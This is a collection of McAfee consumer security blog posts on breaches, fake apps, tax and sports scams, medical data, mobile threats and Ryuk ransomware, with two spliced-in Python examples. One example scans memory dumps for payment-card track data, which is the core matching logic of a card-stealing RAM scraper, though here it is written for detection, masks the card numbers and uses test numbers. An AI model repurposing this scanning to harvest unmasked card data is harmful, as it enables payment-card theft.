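    return total % 10 == 0


def pick_pan(digits: str, anchored: bool):
    """Return the PAN inside a run of digits, or None if nothing passes Luhn.

    With a start sentinel only the whole run is tested. Without one the regex may
    have swallowed unrelated digits sitting just before the PAN in memory, so the
    longest Luhn-valid suffix of plausible length (19 down to 13) is taken instead.
    """
    lengths = [len(digits)] if anchored else range(min(19, len(digits)), 12, -1)
    for n in lengths:
        if luhn_ok(digits[-n:]):
            return digits[-n:]
    return None


def mask(pan: str) -> str:
    """Keep only the BIN and last four so findings can be reported without handling card data."""
    return pan[:6] + '*' * (len(pan) - 10) + pan[-4:]


def find_track_data(buf: bytes) -> list:
    """One record per plausible card in BUF; PANs are masked, offsets point into BUF."""
    hits = []
    for m in TRACK1_RE.finditer(buf):
        pan = pick_pan(m.group(1).decode(), anchored=True)
        yy, mm = m.group(3).decode(), m.group(4).decode()
        if pan and 1 <= int(mm) <= 12:
            hits.append({'track': 1, 'offset': m.start(), 'pan': mask(pan),
                         'name': m.group(2).decode('ascii', 'replace').strip(),
                         'expiry': f'{mm}/{yy}'})
    for m in TRACK2_RE.finditer(buf):
        pan = pick_pan(m.group(2).decode(), anchored=bool(m.group(1)))
        yy, mm = m.group(3).decode(), m.group(4).decode()
        if pan and 1 <= int(mm) <= 12:
            hits.append({'track': 2, 'offset': m.start(), 'pan': mask(pan),
                         'expiry': f'{mm}/{yy}'})
    return sorted(hits, key=lambda h: h['offset'])


# Constructed stand-in for a process memory dump (ISO test PANs, fictitious name).
SAMPLE_DUMP = (
    b'\x00\x00POS.EXE\x00'
    b'%B4111111111111111^DOE/JOHN^24121011000000000?'  # track 1, Luhn-valid
    b'\x00session=42\x00'
    b'9995555555555554444=24121010000000?'             # track 2, no sentinel, stray digits first
    b'\x00;4111111111111112=2412101?\x00'              # track-2 shape but fails Luhn
)

if __name__ == '__main__':
    for hit in find_track_data(SAMPLE_DUMP):
        print(hit)
```

Run against a real dump (for example one taken with a memory-acquisition tool from the payment process), the same function turns up the cleartext track data a scraper would be after; a hit in a process that should never hold unencrypted card data is the finding, and the masked output keeps the report itself out of PCI scope.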

It appears that all 67 Buca di Beppo locations in the U.S., a handful of the 31 Earl of Sandwich locations, and the Planet Hollywood locations in Las Vegas, New York, and Orlando were impacted during this breach. Additionally, Tequila Taqueria in Las Vegas, Chicken Guy! in Disney Springs, and Mixology 101 in Los Angeles were also affected by this breach. Earl Enterprises states that online orders were not affected.

While large company data breaches such as this are difficult to avoid, there are a few steps users can take to better protect their personal data from malicious thieves. Check out the following tips:

  • Keep an eye on your bank account. One of the simplest ways to determine whether someone is fraudulently using your credit card information is to monitor your bank statements. If you see any charges that you did not make, report it to the authorities immediately.
  • Check to see if you’ve been affected. If you know you’ve made purchases at an Earl Enterprises establishment in the last ten months, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you monitor your accounts and alert you to any suspicious activity.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Cybercriminals Feast on Earl Enterprises Customer Data Exposed in Data Breach appeared first on McAfee Blogs.

Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home

Like most parents, before you go to sleep each night, you take extra care to lock doors and windows to keep your family safe from any outside threats. The only thing you may have overlooked is the smartphone illuminated on your nightstand. And if you were to add up the smartphones humming all over your house, suddenly you’d have a number of unlocked doors that a determined criminal could enter through. Maybe not tonight — but eventually.

Digital Ecosystem

Over time you’ve purchased and plugged in devices throughout your home. You might have a voice assistant, a baby monitor, a thermostat, a treadmill, a gaming system, a fitness watch, smart TVs, a refrigerator, and many other fun, useful gadgets. Each purchase likely connects to your smartphone. Take stock: You now have a digital ecosystem growing all around you. And while you rarely stop to take notice of this invisible power grid around you, hackers can’t stop thinking about it.

This digital framework that pulsates within your home gives cybercriminals potential new entryways into your life and your data. Depending on your devices, by accessing your smartphone outsiders may be able to unlock your literal doors while you are away (via your home security system), eavesdrop on your family conversations and collect important information (via your voice assistant), or access financial information (via your gaming system, tablet, or laptop).

What you can do:

  • Change factory security settings. Before you fire up that smart TV, drone, or sound system, be sure to change each product’s factory settings and replace it with a bulletproof password to put a layer of protection between you and would-be hackers.
  • Protect your home network. We are connected people living in connected homes. So, part of the wired lifestyle is taking the lead on doing all we can to protect it. One way to do that is at the router level with built-in network security, which can help secure your connected devices.
  • Stay on top of software updates. Cybercrooks rely on consumers to ignore software updates; it makes their job so much easier. So be sure to install updates to your devices, security software, and IoT products when alerted to do so.

Smartphone = Front Gate

The most common entry point to all of these connected things is your smartphone. While you've done a lot of things to protect your phone (a lock screen, secure passwords on accounts, and system updates), there are hacking tactics you likely know nothing about. According to McAfee's recent Mobile Threat Report, that is because the scope and complexity of mobile hacks are increasing at an alarming rate.

Hidden Apps

The latest statistics report that the average person has between 60 and 90 apps installed on their phone. Multiply that across all the users in your home, and you are looking at anywhere from 200 to 500 apps living under your digital roof. Hackers gravitate toward digital trends. They go where the most people congregate because that's where they can grab the most money. Many of us control everything in our homes from our apps, so app downloads are off the charts, which is why crooks have engineered some of their most sophisticated schemes specifically around app users.

Hidden apps are a way that crooks trick users into letting them inside their phones. Typically they arrive disguised as games or customization tools, sometimes through Google Play itself. TimpDoor, for example, spreads by text message: the SMS carries a link to a supposed voice message, along with detailed instructions for enabling installation of apps from unknown sources. The link downloads a fake voice-messaging app that keeps running in the background after the user closes it. Users often forget they ever installed it and go on with life while the malware quietly keeps the phone open as a backdoor into the networks the phone connects to.

What you can do:

  • Stay alert. Don’t fall for the traps or click links to other apps sent via text message.
  • Stay legit. Only download apps hosted by the original trusted stores and verified partner sites.
  • Avoid spam. Don’t click on any email links, pop-ups, or direct messages that include suspicious links, password prompts, or fake attachments. Delete and block spam emails and texts.
  • Disable and delete. If you are not using an app, disable it. And, as a safety habit, remove apps from your phone, tablet, or laptop you no longer use.

Fake Apps

Again, crooks go where the most people congregate, and this year that is Fortnite, with more than 60 million downloads. The Fortnite craze has led hackers to design fake Fortnite apps masquerading as the real thing. The fraudulent app designers go to great lengths to make the download look legitimate: they offer enticing downloads and promise users a ton of free perks and add-ons. Once users install the fake app, crooks can collect money through ads, send text messages with more bad app links, cryptojack users, or install malware or spyware.

What you can do:

  • Don’t install apps from unknown sources. Not all gaming companies distribute via Google Play or the App Store. This makes it even harder for users to know that the app they are downloading is legit. Do all you can to verify the legitimacy of the site you are downloading from.
  • Delete suspicious acting apps. If you download an app and it begins to request access to anything outside of its service, delete it immediately from your device.
  • Update devices regularly. Keep new bugs and threats at bay by updating your devices automatically.
  • Monitor bank statements. Check statements regularly to monitor the activity of the card linked to your Fortnite account. If you notice repeat or multiple transactions from your account or see charges that you don’t recognize, alert your bank immediately.
  • Be a savvy app user. Verify an app’s legitimacy. Read other user reviews and be discerning before you download anything. This practice also applies to partner sites that sell game hacks, credits, patches, or virtual assets players use to gain rank within a game. Beware of “free” downloads and avoid illegal file-sharing sites. Free downloads can be hotbeds for malware. Stick with the safer, paid options from a reputable source.

The post Hidden & Fake Apps: How Hackers Could Be Targeting Your Connected Home appeared first on McAfee Blogs.

How Online Scams Drive College Basketball Fans Mad

Sports fans everywhere look forward to mid-March for the NCAA men’s college basketball tournament. However, it’s not just college basketball fans that look forward to this time of year. Cybercriminals use March to launch malicious campaigns in the hopes of gaining access to personal information from unsuspecting fans. Let’s take a look at the most popular techniques cybercriminals use to gain access to passwords and financial information, as well as encourage victims to click on suspicious links.

Online betting provides cybercriminals with a wealth of opportunities to steal personal and financial information from users looking to engage with the games while potentially making a few extra bucks. The American Gaming Association (AGA) estimates that consumers will wager $8.5 billion on the 2019 NCAA men’s basketball tournament. What many users don’t realize is that online pools that ask for your personal and credit card information create a perfect opportunity for cybercriminals to take advantage of unsuspecting fans.

In addition to online betting scams, users should also be on the lookout for malicious streaming sites. As fewer and fewer homes have cable, many users look to online streaming sites to keep up with all of the games. However, even seemingly reputable sites could contain malicious phishing links. If a streaming site asks you to download a "player" to watch the games, there's a good chance you could end up with nasty malware on your computer.

Ticket scammers are also on the prowl during March, distributing fake tickets on classified sites they’ve designed to look just like the real thing. Of course, these fake tickets all have the same barcode. With these scams floating around the internet, users looking for cheap tickets to the games may be more susceptible to buying counterfeit tickets if they are just looking for the best deal online and are too hasty in their purchase.

So, if you’re a college basketball fan hoping to partake in this exciting month – what next? In order to enjoy the fun that comes with the NCAA tournament without the risk of cyberthreats, check out the following tips to help you box out cybercriminals this March:

  • Verify the legitimacy of gambling sites. Before creating a new account or providing any personal information on an online gambling website, poke around and look for information any legitimate site would have. Most gambling sites will have information about the site rules (i.e., age requirements) and contact information. If you can’t find such information, you’re better off not using the site.
  • Be leery of free streaming websites. The content on some of these free streaming websites is likely stolen and hosted in a suspicious manner, as well as potentially contains malware. So, if you’re going to watch the games online, it’s best to purchase a subscription from a legitimate streaming service.
  • Stay cautious on popular sports sites and apps. Cybercriminals know that millions of loyal fans will be logging on to popular sports sites and apps to stay updated on the scores. Be careful when visiting these sites not to click on suspicious ads or links that could lead to malware. If you see an offer that interests you in an online ad, you're better off going directly to the website of the company displaying the ad instead of clicking on the ad from the sports site or app.
  • Beware of online ticket scams. Scammers will be looking to steal payment information from fans in search of last-minute tickets to the games. To avoid this, it’s best to buy directly from the venue whenever possible. If you decide to purchase from a reseller, make sure to do your research and only buy from trusted vendors.
  • Use comprehensive security software. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links, and will warn you in the event that you do accidentally click on something malicious. It will provide visual warnings if you’re about to go to a suspicious site.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post How Online Scams Drive College Basketball Fans Mad appeared first on McAfee Blogs.

How to Safeguard Your Family Against A Medical Data Breach

The risk to your family's healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out, or with the online application for healthcare you completed.

That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

Breaches on the Rise

Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, that 75% of the breached, lost, or stolen records were exposed through a hacking or IT incident, and that the cost to consumers was nearly $6 billion.

The IoT Factor


Medical facilities are not the only thing vulnerable to hackers: the growth of Internet of Things (IoT) consumer products, which in short means everything is digitally connected to everything else, also provides entry points. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, and heart and blood pressure monitors.

To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

The Dark Web

The engine driving healthcare attacks of all kinds is the Dark Web where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

Some of the most valuable data to criminals is children's health information (stolen from pediatricians' offices), since a child's credit record is clean and therefore a more useful tool in credit fraud.

According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

“The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” Says Samani.


Healthcare professionals, hospitals, and health insurance companies, while they give criminals an entry point and are responsible for the data, aren't the bad guys. They are fined by the government for breaches and for lacking proper security, and targeted and extorted by cyber crooks, all while focusing on patient care and outcomes. Another factor working against them is the shortage of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker, matters. There are some things you can do to strengthen your family’s healthcare data practices.

Ways to Safeguard Medical Data

Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

How to Protect IoT Devices


According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

  • Change default usernames and passwords
  • Isolate IoT devices on their own protected network
  • Configure network firewalls to inhibit traffic from unauthorized IP addresses
  • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
  • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
  • Ensure devices and their associated security patches are up-to-date
  • Apply cybersecurity best practices when connecting devices to a wireless network
  • Invest in a secure router with appropriate security and authentication practices

The post How to Safeguard Your Family Against A Medical Data Breach appeared first on McAfee Blogs.

How to Steer Clear of Tax Season Scams

*This blog contains research discovered by Elizabeth Farrell

It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.

So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.

In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. Even back in December, we saw a surge of new email phishing scams trying to fool consumers into thinking the message was coming from the IRS or other members of the tax community. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.

Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.

Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are concerned about how much they might owe or are predicting how much they’ll get back on their tax refund, and scammers play to both of these emotions. So, as hundreds of taxpayers are waiting for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:

  • File before cybercriminals do it for you. The easiest defense you can take against tax season schemes is to get your hands on your W-2 and file as soon as possible. The more promptly you file, the less likely your data will be raked in by a cybercriminal.
  • Obtain a copy of your credit report. FYI – you’re entitled to a free copy of your credit report from each of the major bureaus once a year. So, make it a habit to request a copy of your file every three to four months, each time from a different credit bureau. That way, you can keep better track of and monitor any suspicious activity and act early if something appears fishy.
  • Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Be wary of strange file attachment names such as “virus-for-you.doc.” Remember: the IRS only contacts people by snail mail, so if you get an email from someone claiming to be from the IRS, stay away.
  • Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
  • Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.
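The "investigate the domain" advice above is easy to state and easy to get wrong: irs.gov.example.com is not the IRS, and a one-letter typosquat passes a quick glance. The Python below is an added example, not McAfee's code, that pulls every link out of an email body and classifies its host three ways: the registrable domain is on an allow-list of the impersonated brands' real domains; a trusted domain or brand word is being used inside some other domain; or the registrable domain is within two edits of a trusted one. The allow-list, the brand words, the small public-suffix stand-in and the sample "IRS Important Notice" email are all constructed for the example.

```python
"""Triage the links in a suspicious tax-season email: does each one really lead to the
brand it claims to? Added example; the allow-list, brand words and email are constructed."""
import re
from urllib.parse import urlsplit

# Hypothetical allow-list: the registrable domains the impersonated brands really use.
TRUSTED = {'irs.gov', 'intuit.com'}          # turbotax.intuit.com sits under intuit.com
# Brand words whose appearance inside any other domain is a red flag.
BRANDS = {'irs', 'turbotax', 'intuit'}
# Tiny stand-in for the Public Suffix List; production code should load the real list.
MULTI_LABEL_SUFFIXES = {'co.uk', 'com.au', 'co.jp'}
URL_RE = re.compile(r'https?://[^\s<>"\')]+')


def registrable_domain(host: str) -> str:
    """'irs.gov.refund-verify-center.com' -> 'refund-verify-center.com'."""
    labels = host.lower().rstrip('.').split('.')
    n = 3 if '.'.join(labels[-2:]) in MULTI_LABEL_SUFFIXES else 2
    return '.'.join(labels[-n:])


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch typosquats such as intult.com for intuit.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_url(url: str) -> str:
    """Return 'trusted', 'lookalike' or 'unknown' for a single URL."""
    host = (urlsplit(url).hostname or '').lower()
    if not host:
        return 'unknown'
    reg = registrable_domain(host)
    if reg in TRUSTED:
        return 'trusted'
    # Trusted domain used as a subdomain prefix: irs.gov.refund-verify-center.com
    if any(host.startswith(t + '.') for t in TRUSTED):
        return 'lookalike'
    # Brand word as a label or hyphenated token of an untrusted domain: turbotax-update-2018.com
    tokens = {tok for label in host.split('.') for tok in label.split('-')}
    if tokens & BRANDS:
        return 'lookalike'
    # One or two edits away from a trusted domain: intult.com
    if any(levenshtein(reg, t) <= 2 for t in TRUSTED):
        return 'lookalike'
    return 'unknown'


def triage(email_text: str) -> list:
    """(url, verdict) for every link in the email body, in order of appearance."""
    return [(url, classify_url(url)) for url in URL_RE.findall(email_text)]


# Constructed phishing email modelled on the "IRS Important Notice" lure described above.
SAMPLE_EMAIL = """\
Subject: IRS Important Notice

Your refund is on hold. Confirm your identity within 24 hours at
http://irs.gov.refund-verify-center.com/confirm
Official guidance: https://www.irs.gov/refunds
Get the 2018 TurboTax update here: https://turbotax-update-2018.com/setup.exe
or sign in at https://intult.com/turbotax/login
Real product site: https://turbotax.intuit.com/
Unrelated: https://support.google.com/mail
"""

if __name__ == '__main__':
    for url, verdict in triage(SAMPLE_EMAIL):
        print(f'{verdict:9} {url}')
```

Only the host is judged; the path and the anchor text are exactly what the scammer controls and are ignored on purpose. A 'lookalike' verdict is a strong signal, 'unknown' is not a clean bill of health, and in a mail gateway the same classifier would feed a quarantine rule rather than a print statement.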

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blogs.

Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report

These days, we seem to have a newfound reliance on all things ‘smart.’ We give these devices the keys to our digital lives, entrusting them with tons of personal information. In fact, we are so eager to adopt this technology that we connect 4,800 devices per minute to the internet with no sign of slowing down.  This is largely because smart devices make our lives easier and enjoyable. But even though these devices are convenient, it’s important to understand they’re also convenient for cybercriminals, given they contain a treasure trove of personal data. To examine how exactly these hackers plan on capturing that data, we at McAfee have taken a deep dive into the mobile threat landscape in this year’s Mobile Threat Report. In this report, we examine some of the most significant threat trends, including new spyware, mobile malware, and IoT attack surfaces. Let’s take a look at these trends and how you can keep all your devices protected.

Operations RedDawn and FoulGoal

In our 2018 report, we predicted that attacks targeted toward mobile devices would increase, and everything from fake Fortnite apps to increased mobile malware has proven this to be true. However, two recent discoveries, Operation RedDawn and FoulGoal, prove just how targeted these attacks can really get. RedDawn, in particular, has set its sights on North Korean refugees, as the spyware attempts to copy photos, contacts, SMS messages, and other personal data belonging to the victim.

The latter attack, FoulGoal, actually occurred during last year’s World Cup, as the campaign used an app called Golden Cup to install spyware on victims’ devices. This app promised users live streams of games from the Russian 2018 FIFA World Cup, as well as a searchable database of previous World Cup records. In addition to stealing the user’s phone number, device details, and installed packages, FoulGoal also downloaded spyware to expand its infection into SMS messages, contacts, GPS details, and audio recordings.

A Virtual Backdoor

Our smartphones are now like remote controls for our smart homes, controlling everything from lights to locks to kitchen appliances. So, it was only a matter of time before cybercriminals looked for ways to trick users into leaving open a virtual backdoor. Enter TimpDoor, an Android-based malware family that does just that. First appearing in March 2018, it quickly became the leading mobile backdoor family, as it runs a SMiShing campaign that tricks users into downloading fake voice-messaging apps.

These virtual backdoors are now an ever-growing threat as hackers begin to take advantage of the always-connected nature of mobile phones and other connected devices. Once distributed as Trojanized apps through apps stores, like Google Play, these backdoors can come disguised as add-on games or customization tools. And while most are removed fairly quickly from app stores, hackers can still pivot their distribution efforts and leverage popular websites to conceive a socially engineered attack to trick users into enabling unknown sources.

The Voice Heard Around the Home

Around the world, there are already over 25 million voice assistants, or smart speakers, in use. From simple queries to controlling other IoT gadgets throughout the home, these devices play a big role in our living environments. But many of these IoT devices fail to pass even the most basic security practices, and have easily guessable passwords, notable buffer overflow issues, and unpatched vulnerabilities. This makes voice assistants an increasingly valuable and potentially profitable attack vector for cybercrime.

For a typical voice assistant in the home, the attack surface is quite broad. Cybercriminals could gain access to the microphone or listening stream, and then monitor everything said. Additionally, they could command the speakers to perform actions via other speaker devices, such as embedding commands in a TV program or internet video. Crooks could even alter customized actions to somehow aid their malicious schemes. However, some of the most pressing vulnerabilities can come from associated IoT devices, such as smart plugs, door locks, cameras, or connected appliances, which can have their own flaws and could provide unrestrained access to the rest of the home network.

The good news? We at McAfee are working tirelessly to evolve our home and mobile solutions to keep you protected from any current and future threats. Plus, there are quite a few steps you can personally take to secure your devices. Start by following these tips:

  • Delete apps at the first sign of suspicious activity. If an app requests access to anything outside of its service, or didn’t originate from a trusted source, remove it immediately from your device.
  • Protect your devices by protecting your home network. While we continue to embrace the idea of “smart homes” and connected devices, we also need to embrace the idea that with great connectivity, comes great responsibility to secure those connections. Consider built-in network security, which can automatically secure your connected devices at the router-level.
  • Keep your security software up-to-date. Whether it’s an antivirus solution or a comprehensive security suite, always keep your security solutions up-to-date. Software and firmware patches are ever-evolving and are made to combat newly discovered threats, so be sure to update every time you’re prompted to. Better yet, flip on automatic updates.
  • Change your device’s factory security settings. When it comes to products, many manufacturers don’t think “security first.” That means your device can be potentially vulnerable as soon as you open the box. By changing the factory settings you’re instantly upping your smart device’s security.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report appeared first on McAfee Blogs.

Quick Heal Threat Report – Cryptojacking rising but Ransomware still #1 threat for consumers

In wake of the growing incidences of targeted cyber-attacks on enterprises using Cryptojacking, due to its ease of deployment and instant return on investments; it rather comes as a surprise that malware authors are still counting on Ransomware for targeting consumers and home users. Yes, you heard it right! According…

Ryuk, Exploring the Human Connection

In collaboration with Bill Siegel and Alex Holdtman from Coveware.


At the beginning of 2019, McAfee ATR published an article describing how the hasty attribution of Ryuk ransomware to North Korea was missing the point. Since then, collective industry peers discovered additional technical details on Ryuk’s inner workings, the overlap between Ryuk and Hermes2.1, and a detailed description of how the ransomware is piggybacking the infamous and ever evolving Trickbot as a primary attack vector. In this blog post we have teamed up with Coveware to take a closer look at the adversary and victim dynamics of Ryuk Ransomware. We structured our research using the Diamond threat model and challenged our existing hypotheses with fresh insights.

Introduction to The Diamond Model

Within Cyber Threat intelligence research, a popular approach is to model the characteristics of an attack using The Diamond Model of Intrusion Analysis. This model relates four basic elements of an intrusion: adversary, capabilities, infrastructure and victim.

For the Ryuk case described above the model can be applied as follows: “An adversary, cyber-criminal(s), has a capability (Ryuk ransomware) that is being spread via a TrickBot infection infrastructure, targeting specific victims.”

Diamond model of Intrusion Analysis

The Diamond Model offers a holistic view of an intrusion that is a helpful guideline to shape the direction of intelligence research. By searching for relationships between two elements one can gather new evidence. For instance, by analyzing and reverse engineering a piece of malware one might uncover that a certain server is being used for command and control infrastructure, thus linking capability with infrastructure (as shown below).

Linking Infrastructure and Capability

Alternatively, one might search underground forums to find information on adversaries who sell certain pieces of malware, thus linking an adversary with a capability. For instance, finding the underground forum advertisement of Hermes2.1.

Linking Adversary and Capability

Analysis of Competing Hypotheses

In our earlier publication we explained The Analysis of Competing Hypotheses (ACH), the process of challenging formed hypotheses with research findings.
By following this method, we concluded that the strongest hypothesis is not the one with the most verifying evidence, but the one with the least falsifying evidence.

In order to construct a hypothesis with the least falsifying evidence, we welcome research published by our industry peers that disseminates insights which challenge our hypotheses. When we combined all the evidence with the links on the Diamond Model, we discovered that one essential link hadn’t been made: the link between adversary and victim.

Seeking New Insights Between Adversary and Victim

Despite published research, the direct link between adversary and victim remained relatively unexplored. Unlike most cybercrime, ransomware and digital extortion frequently create a strong social connection between adversary and victim. The adversary has certain needs and views the victim as the means to fulfill those needs. The connection between an adversary and victim often generates valuable insights, especially in cases where (extensive) negotiations take place.

Luckily, one of our NoMoreRansom partners, Coveware, specializes in ransomware negotiations and has gained valuable insights that help us link adversary and victim.

The social connection between Adversary and Victim

Ransom Amounts and Negotiations

By aggregating ransomware negotiation and payment data, Coveware is able to identify strain-specific ransomware trends. With regards to Ryuk, it should be noted that ransom amounts average more than 10x the average, making it the costliest type of ransomware. Coveware also observed that some Ryuk ransoms were highly negotiable, while others were not. The bar-belled negotiation results generated an average ransom payment of $71k, a 60% discount from an average opening ask of $145k.

The bar-belled negotiation outcomes meant that some victims were stonewalled. These victims either lost their data or took on staggering financial risk to pay the ransom. The outcomes also imply that in certain cases the adversary would rather receive infrequent large windfalls (often in excess of 100BTC), while in other cases the adversary was keen to monetize every attack and accept lower amounts to ensure payment. This difference in modus operandi suggests that more than one cyber-criminal group is operating Ryuk ransomware.

Ransom Note and Negotiation Similarities and Differences

Similarities between Bitpaymer and Ryuk ransom notes have been observed before. While it is not uncommon for ransom notes to share similar language, sequences of phrases tend to remain within the same ransomware family. Slight copy+paste modifications are made to the ransom text as a variant is passed along to different groups, but large alterations are rarely made. Below is a comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right).

A comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right)

The shared language implies that text once unique to a Bitpaymer campaign was borrowed for a Ryuk campaign, possibly by an operator running simultaneous ransom campaigns of both Bitpaymer and Ryuk; alternatively, the imitation can be considered the sincerest form of flattery.

Different Initial Email Response May Be Different Adversaries?

A more dramatic scripted communication difference has been observed in the initial email response from Ryuk adversaries. The initial email response is typically identical within ransomware families belonging to the same campaign. When significant differences in length, language, and initial ransom amount appear in the initial email response, we are comfortable assuming they belong to unique groups with unique modus operandi. This would mean that Ryuk is being spread by more than one actor group.

Below are two such Ryuk examples:


Post Payment Bitcoin Activity

A final indicator that multiple groups are running simultaneous Ryuk campaigns can be observed in the activity of the bitcoin after it hits a ransom address. Surprisingly, despite the differences between negotiation outcome and initial communications, Coveware observed little difference between the BTC wallets (blacked out to protect victims) associated with the above cases. Initial comparison showed no meaningful discrepancy between the time of a ransom payment and the time of the corresponding withdrawal. Additionally, the distribution of funds upon withdrawal was consistently split between two addresses. Coveware will continue to monitor the funds associated with campaigns for meaningful indicators.

Ryuk Negotiating Profiles

With few exceptions, the rest of the email replies during a Ryuk extortion negotiation are extremely short and blunt. Typical replies and retorts are generally less than 10 written words and often just a single number if the ransom amount is the point of discussion. This correspondence is unique to Ryuk.

